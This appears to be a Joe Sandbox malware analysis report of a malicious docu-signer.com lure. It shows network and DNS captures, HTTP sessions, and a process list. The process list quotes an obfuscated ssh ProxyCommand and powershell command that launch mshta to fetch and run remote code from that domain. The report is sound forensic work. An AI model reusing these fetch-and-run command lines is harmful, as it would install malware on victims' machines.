Dec 31, 2024 15:41:49.756081104 CET | 49706 | 443 | 192.168.2.7 | 104.21.87.65
Dec 31, 2024 15:41:49.762646914 CET | 49706 | 443 | 192.168.2.7 | 104.21.87.65
Dec 31, 2024 15:41:49.762675047 CET | 443 | 49706 | 104.21.87.65 | 192.168.2.7
Dec 31, 2024 15:41:49.769836903 CET | 49707 | 443 | 192.168.2.7 | 104.21.87.65
Dec 31, 2024 15:41:49.769912004 CET | 443 | 49707 | 104.21.87.65 | 192.168.2.7
Dec 31, 2024 15:41:49.770020008 CET | 49707 | 443 | 192.168.2.7 | 104.21.87.65
Dec 31, 2024 15:41:49.770277977 CET | 49707 | 443 | 192.168.2.7 | 104.21.87.65
Dec 31, 2024 15:41:49.770298004 CET | 443 | 49707 | 104.21.87.65 | 192.168.2.7
Dec 31, 2024 15:41:50.225982904 CET | 443 | 49707 | 104.21.87.65 | 192.168.2.7
Dec 31, 2024 15:41:50.226056099 CET | 49707 | 443 | 192.168.2.7 | 104.21.87.65
Dec 31, 2024 15:41:50.226516962 CET | 49707 | 443 | 192.168.2.7 | 104.21.87.65
Dec 31, 2024 15:41:50.226531029 CET | 443 | 49707 | 104.21.87.65 | 192.168.2.7
Dec 31, 2024 15:41:50.226825953 CET | 49707 | 443 | 192.168.2.7 | 104.21.87.65
Dec 31, 2024 15:41:50.226833105 CET | 443 | 49707 | 104.21.87.65 | 192.168.2.7
Dec 31, 2024 15:41:50.351628065 CET | 443 | 49707 | 104.21.87.65 | 192.168.2.7
Dec 31, 2024 15:41:50.351689100 CET | 49707 | 443 | 192.168.2.7 | 104.21.87.65
Dec 31, 2024 15:41:50.351700068 CET | 443 | 49707 | 104.21.87.65 | 192.168.2.7
Dec 31, 2024 15:41:50.351711988 CET | 443 | 49707 | 104.21.87.65 | 192.168.2.7
Dec 31, 2024 15:41:50.351743937 CET | 49707 | 443 | 192.168.2.7 | 104.21.87.65
Dec 31, 2024 15:41:50.351773024 CET | 49707 | 443 | 192.168.2.7 | 104.21.87.65
Dec 31, 2024 15:41:50.351779938 CET | 443 | 49707 | 104.21.87.65 | 192.168.2.7
Dec 31, 2024 15:41:50.351823092 CET | 49707 | 443 | 192.168.2.7 | 104.21.87.65
Dec 31, 2024 15:41:50.355993032 CET | 443 | 49707 | 104.21.87.65 | 192.168.2.7
Dec 31, 2024 15:41:50.356048107 CET | 49707 | 443 | 192.168.2.7 | 104.21.87.65
Dec 31, 2024 15:41:50.356055021 CET | 443 | 49707 | 104.21.87.65 | 192.168.2.7
Dec 31, 2024 15:41:50.356098890 CET | 49707 | 443 | 192.168.2.7 | 104.21.87.65
Dec 31, 2024 15:41:50.356102943 CET | 443 | 49707 | 104.21.87.65 | 192.168.2.7
Dec 31, 2024 15:41:50.356146097 CET | 49707 | 443 | 192.168.2.7 | 104.21.87.65
Dec 31, 2024 15:41:50.360846996 CET | 443 | 49707 | 104.21.87.65 | 192.168.2.7
Dec 31, 2024 15:41:50.360901117 CET | 49707 | 443 | 192.168.2.7 | 104.21.87.65
Dec 31, 2024 15:41:50.360909939 CET | 443 | 49707 | 104.21.87.65 | 192.168.2.7
Dec 31, 2024 15:41:50.360950947 CET | 49707 | 443 | 192.168.2.7 | 104.21.87.65
Dec 31, 2024 15:41:50.360950947 CET | 443 | 49707 | 104.21.87.65 | 192.168.2.7
Dec 31, 2024 15:41:50.360979080 CET | 443 | 49707 | 104.21.87.65 | 192.168.2.7
Dec 31, 2024 15:41:50.361032009 CET | 49707 | 443 | 192.168.2.7 | 104.21.87.65
Dec 31, 2024 15:41:50.361053944 CET | 49707 | 443 | 192.168.2.7 | 104.21.87.65
Dec 31, 2024 15:41:50.365539074 CET | 443 | 49707 | 104.21.87.65 | 192.168.2.7
Dec 31, 2024 15:41:50.365596056 CET | 49707 | 443 | 192.168.2.7 | 104.21.87.65
Dec 31, 2024 15:41:50.438179970 CET | 443 | 49707 | 104.21.87.65 | 192.168.2.7
Dec 31, 2024 15:41:50.438230991 CET | 443 | 49707 | 104.21.87.65 | 192.168.2.7
                                    Dec 31, 2024 15:41:50.438234091 CET49707443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:50.438262939 CET44349707104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:50.438298941 CET49707443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:50.438333035 CET49707443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:50.438338041 CET44349707104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:50.438384056 CET49707443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:50.438785076 CET44349707104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:50.438839912 CET49707443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:50.438844919 CET44349707104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:50.438905001 CET49707443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:50.438906908 CET44349707104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:50.438955069 CET49707443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:50.439244986 CET49707443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:50.439261913 CET44349707104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:50.544245958 CET49708443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:50.544292927 CET44349708104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:50.544373035 CET49708443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:50.544749975 CET49708443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:50.544768095 CET44349708104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:51.028227091 CET44349708104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:51.028289080 CET49708443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:51.028681993 CET49708443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:51.028688908 CET44349708104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:51.028939962 CET49708443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:51.028944969 CET44349708104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:51.152869940 CET44349708104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:51.152935028 CET49708443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:51.152945042 CET44349708104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:51.152991056 CET49708443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:51.153634071 CET49708443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:51.153656960 CET44349708104.21.87.65192.168.2.7
                                     Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                     Dec 31, 2024 15:41:48.981556892 CET | 63696 | 53 | 192.168.2.7 | 1.1.1.1
                                     Dec 31, 2024 15:41:48.996767998 CET | 53 | 63696 | 1.1.1.1 | 192.168.2.7

                                     Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                     Dec 31, 2024 15:41:48.981556892 CET | 192.168.2.7 | 1.1.1.1 | 0x528d | Standard query (0) | docu-signer.com | A (IP address) | IN (0x0001) | false

                                     Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                     Dec 31, 2024 15:41:48.996767998 CET | 1.1.1.1 | 192.168.2.7 | 0x528d | No error (0) | docu-signer.com | | 104.21.87.65 | A (IP address) | IN (0x0001) | false
                                     Dec 31, 2024 15:41:48.996767998 CET | 1.1.1.1 | 192.168.2.7 | 0x528d | No error (0) | docu-signer.com | | 172.67.142.2 | A (IP address) | IN (0x0001) | false
                                    • docu-signer.com
                                    • https:
                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                     0 | 192.168.2.7 | 49706 | 104.21.87.65 | 443 | 7764 | C:\Windows\System32\mshta.exe
                                     Timestamp | Bytes transferred | Direction | Data
                                     2024-12-31 14:41:49 UTC | 346 | OUT | GET /api/uz/0912545164/index.mp4 HTTP/1.1
                                     Accept: */*
                                     Accept-Language: en-CH
                                     UA-CPU: AMD64
                                     Accept-Encoding: gzip, deflate
                                     User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                     Host: docu-signer.com
                                     Connection: Keep-Alive
                                     2024-12-31 14:41:49 UTC | 550 | IN | HTTP/1.1 403 Forbidden
                                     Date: Tue, 31 Dec 2024 14:41:49 GMT
                                     Content-Type: text/html; charset=UTF-8
                                     Transfer-Encoding: chunked
                                     Connection: close
                                     X-Frame-Options: SAMEORIGIN
                                     Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lomOCgu9kEEfK2C8kSDEi6gRxd1TFMSDdFXSc4UQzFI2wrJ%2FZxWDFtDHWYselPQvATrwRrXkj0bUUpB6KuFKvbKIKJjcHSi6bWun2Un87ZwfPsKciNFGQXhfPcN3eiMm3w8%3D"}],"group":"cf-nel","max_age":604800}
                                     NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                     Server: cloudflare
                                     CF-RAY: 8fab085da9a372b9-EWR
                                     2024-12-31 14:41:49 UTC | 819 | IN | Data Ascii: 11dc<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                     2024-12-31 14:41:49 UTC | 1369 | IN | Data Ascii: f.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cooki
                                     2024-12-31 14:41:49 UTC | 1369 | IN | Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn
                                     2024-12-31 14:41:49 UTC | 1023 | IN | Data Ascii: -ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:m
                                     2024-12-31 14:41:49 UTC | 5 | IN | Data Ascii: 0


                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                     1 | 192.168.2.7 | 49707 | 104.21.87.65 | 443 | 7764 | C:\Windows\System32\mshta.exe
                                     Timestamp | Bytes transferred | Direction | Data
                                     2024-12-31 14:41:50 UTC | 409 | OUT | GET /cdn-cgi/styles/cf.errors.css HTTP/1.1
                                     Accept: */*
                                     Referer: https://docu-signer.com/api/uz/0912545164/index.mp4
                                     Accept-Language: en-CH
                                     UA-CPU: AMD64
                                     Accept-Encoding: gzip, deflate
                                     User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                     Host: docu-signer.com
                                     Connection: Keep-Alive
                                     2024-12-31 14:41:50 UTC | 411 | IN | HTTP/1.1 200 OK
                                     Date: Tue, 31 Dec 2024 14:41:50 GMT
                                     Content-Type: text/css
                                     Content-Length: 24051
                                     Connection: close
                                     Last-Modified: Mon, 16 Dec 2024 06:11:56 GMT
                                     ETag: "675fc4ac-5df3"
                                     Server: cloudflare
                                     CF-RAY: 8fab086169390f69-EWR
                                     X-Frame-Options: DENY
                                     X-Content-Type-Options: nosniff
                                     Expires: Tue, 31 Dec 2024 16:41:50 GMT
                                     Cache-Control: max-age=7200
                                     Cache-Control: public
                                     Accept-Ranges: bytes


                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                     2 | 192.168.2.7 | 49708 | 104.21.87.65 | 443 | 7764 | C:\Windows\System32\mshta.exe
                                     Timestamp | Bytes transferred | Direction | Data
                                     2024-12-31 14:41:51 UTC | 427 | OUT | GET /cdn-cgi/images/icon-exclamation.png?1376755637 HTTP/1.1
                                     Accept: */*
                                     Referer: https://docu-signer.com/api/uz/0912545164/index.mp4
                                     Accept-Language: en-CH
                                     UA-CPU: AMD64
                                     Accept-Encoding: gzip, deflate
                                     User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                     Host: docu-signer.com
                                     Connection: Keep-Alive
                                     2024-12-31 14:41:51 UTC | 409 | IN | HTTP/1.1 200 OK
                                     Date: Tue, 31 Dec 2024 14:41:51 GMT
                                     Content-Type: image/png
                                     Content-Length: 452
                                     Connection: close
                                     Last-Modified: Mon, 16 Dec 2024 06:11:56 GMT
                                     ETag: "675fc4ac-1c4"
                                     Server: cloudflare
                                     CF-RAY: 8fab08665e8e8c81-EWR
                                     X-Frame-Options: DENY
                                     X-Content-Type-Options: nosniff
                                     Expires: Tue, 31 Dec 2024 16:41:51 GMT
                                     Cache-Control: max-age=7200
                                     Cache-Control: public
                                     Accept-Ranges: bytes



                                    Target ID:1
                                    Start time:09:41:43
                                    Start date:31/12/2024
                                    Path:C:\Windows\System32\OpenSSH\ssh.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'ALC15Y7xI6iZdmshta https://docu-signer.com/api/uz/0912545164/index.mp4ALC15Y7xI6iZd'.SubString(13, 57)" .
                                    Imagebase:0x7ff6f5790000
                                    File size:946'176 bytes
                                    MD5 hash:C05426E6F6DFB30FB78FBA874A2FF7DC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:false

                                    Target ID:2
                                    Start time:09:41:43
                                    Start date:31/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:3
                                    Start time:09:41:44
                                    Start date:31/12/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:powershell powershell -Command 'ALC15Y7xI6iZdmshta https://docu-signer.com/api/uz/0912545164/index.mp4ALC15Y7xI6iZd'.SubString(13, 57)
                                    Imagebase:0x7ff741d30000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:4
                                    Start time:09:41:46
                                    Start date:31/12/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://docu-signer.com/api/uz/0912545164/index.mp4"
                                    Imagebase:0x7ff741d30000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:5
                                    Start time:09:41:46
                                    Start date:31/12/2024
                                    Path:C:\Windows\System32\mshta.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\system32\mshta.exe" https://docu-signer.com/api/uz/0912545164/index.mp4
                                    Imagebase:0x7ff696ce0000
                                    File size:14'848 bytes
                                    MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:false

                                    Target ID:7
                                    Start time:09:41:50
                                    Start date:31/12/2024
                                    Path:C:\Windows\System32\svchost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                    Imagebase:0x7ff7b4ee0000
                                    File size:55'320 bytes
                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1465586607.00007FFAAC540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC540000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ffaac540000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                      • Instruction ID: 93d3fdf9ee1a8a440eedcd2d7ae171c4928e04bcfd6d08fa7e30168330699156
                                      • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                      • Instruction Fuzzy Hash: 3201677115CB0D8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3661DA36E882CB45
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2682194545.00000180AF340000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000180AF340000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_180af340000_mshta.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                      • Instruction ID: 95c70015d66722e14df5ff09e27bfe6da325f97d8d3ce628a18b11a40bb7e97a
                                      • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                      • Instruction Fuzzy Hash: 8D90025959950A55D55911911C4629C5040678C252FD484944827911C4D84D039A1252